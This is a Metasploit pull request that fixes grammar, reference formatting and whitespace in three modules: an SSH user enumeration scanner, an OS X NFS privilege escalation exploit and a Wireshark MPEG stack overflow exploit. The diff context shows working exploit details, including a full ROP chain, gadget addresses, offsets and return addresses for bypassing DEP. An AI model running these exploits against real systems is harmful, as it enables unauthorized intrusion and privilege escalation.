### PR TITLE
Fixup release

### DIFF
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -17,12 +17,16 @@ class Metasploit3 < Msf::Auxiliary
       'Name'        => 'SSH Username Enumeration',
       'Description' => %q{
         This module uses a time-based attack to enumerate users in a OpenSSH server.
-      },
-      'Author'      => ['kenkeiras'],
-      'References'  =>
-        [
-          ['CVE', '2006-5229']
-        ],
+        On some versions of OpenSSH under some configurations, OpenSSH will prompt
+        for a password for an invalid user faster than for a valid user.
+        },
+        'Author'      => ['kenkeiras'],
+        'References'  =>
+         [
+           ['CVE',   '2006-5229'],
+           ['OSVDB', '32721'],
+           ['BID',   '20418']
+         ],
       'License'     => MSF_LICENSE
     ))
 

--- a/modules/exploits/osx/local/nfs_mount_root.rb
+++ b/modules/exploits/osx/local/nfs_mount_root.rb
@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Local
       'Description'   => %q{
         This exploit leverage a stack overflow vulnerability to escalate privileges.
         The vulnerable function nfs_convert_old_nfs_args does not verify the size
-        of a user-provided argument before copying it to the stack. As a result by
-        passing a large size, a local user can overwrite the stack with arbitrary
+        of a user-provided argument before copying it to the stack. As a result, by
+        passing a large size as an argument, a local user can overwrite the stack with arbitrary
         content.
 
         Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
@@ -67,11 +67,11 @@ class Metasploit3 < Msf::Exploit::Local
     tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
     payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
 
-    print_status "Writing temp file... #{tmpfile}"
+    print_status "Writing temp file as '#{tmpfile}'"
     write_file(tmpfile, exploit)
     register_file_for_cleanup(tmpfile)
 
-    print_status "Writing payload file... #{payloadfile}"
+    print_status "Writing payload file as '#{payloadfile}'"
     write_file(payloadfile, pload)
     register_file_for_cleanup(payloadfile)
 

--- a/modules/exploits/osx/local/nfs_mount_root.rb
+++ b/modules/exploits/osx/local/nfs_mount_root.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Local
     super(update_info(info,
       'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
       'Description'   => %q{
-        This exploit leverage a stack overflow vulnerability to escalate privileges.
+        This exploit leverages a stack overflow vulnerability to escalate privileges.
         The vulnerable function nfs_convert_old_nfs_args does not verify the size
         of a user-provided argument before copying it to the stack. As a result, by
         passing a large size as an argument, a local user can overwrite the stack with arbitrary

--- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
+++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
+      'Name'           => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
       'Description'    => %q{
           This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
           by generating an malicious file.)
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-	  'Wesley Neelen', # Discovery vulnerability
+          'Wesley Neelen', # Discovery vulnerability
           'j0sm1',  # Exploit and msf module
         ],
       'References'     =>
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'CVE', '2014-2299'],
           [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
           [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
-          [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
+          [ 'BID', '66066']
         ],
       'DefaultOptions' =>
         {
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'BadChars'    => "\xff",
           'Space'       => 600,
           'DisableNops' => 'True',
-          'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 
+          'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -49,11 +49,11 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'OffSet' => 69732,
               'OffSet2' => 70476,
-              'Ret'    => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 
+              'Ret'    => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
               'jmpesp' => 0x68e2bfb9,
             }
           ],
-	  [ 'WinXP SP2/SP3 English  (bypass DEP)',
+        [ 'WinXP SP2/SP3 English  (bypass DEP)',
             {
               'OffSet2' => 70692,
               'OffSet' => 70476,
@@ -75,25 +75,25 @@ class Metasploit3 < Msf::Exploit::Remote
   def create_rop_chain()
 
     # rop chain generated with mona.py - www.corelan.be
-    rop_gadgets = 
+    rop_gadgets =
     [
       0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x62d9027c,  # ptr to &VirtualProtect() [IAT libcares-2.dll]
-      0x61970969,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
-      0x61988cf6,  # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
+      0x61970969,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x61988cf6,  # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x619c0a2a,  # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x61841e98,  # & push esp # ret  [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x6191d11a,  # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x00000201,  # 0x00000201-> ebx
-      0x5a4c1414,  # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 
+      0x5a4c1414,  # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
       0x00000040,  # 0x00000040-> edx
       0x6197660f,  # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x668242b9,  # &Writable location [libgnutls-26.dll]
       0x6199b8a5,  # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
       0x63a528c2,  # RETN (ROP NOP) [libgobject-2.0-0.dll]
-      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
+      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x90909090,  # nop
-      0x6199652d,  # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
+      0x6199652d,  # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
     ].flatten.pack("V*")
 
     return rop_gadgets


### PR DESCRIPTION
This fixes up several grammar, description, and msftidy errors. In incorporates the non-code parts of #3310 but shouldn't conflict.
## Verification
- [x] See the modules load. Some arrays of vuln refs were changed which risks missing commas.
- [x] Otherwise, notice no new spelling/grammar errors.
